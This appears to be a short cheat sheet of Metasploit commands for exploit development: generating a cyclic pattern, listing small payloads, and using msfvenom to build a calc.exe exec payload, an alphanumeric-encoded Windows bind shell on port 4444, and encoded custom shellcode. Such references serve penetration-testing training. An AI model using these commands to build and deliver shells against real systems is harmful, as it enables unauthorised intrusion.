./pattern_create.rb -l 5000 | Create a random pattern of 5000 chars |
./payload_lengths.rb | awk '$2<200' | Display all the payloads in metasploit that have the size less than 200 |
msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f raw -b '\x00\x0d\x0a' --smallest | Generate the smallest payload that will execute calc.exe |
msfvenom msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/alpha_mixed -f raw | Generate an alphanumeric bind payload (default port 4444) |
cat shellcode.bin | msfvenom -p - -a x86 --platform windows -e x86/alpha_mixed -f raw > shellcode_alpha_mixed.bin | Encode a custom shellcode with x86/alpha_mixed |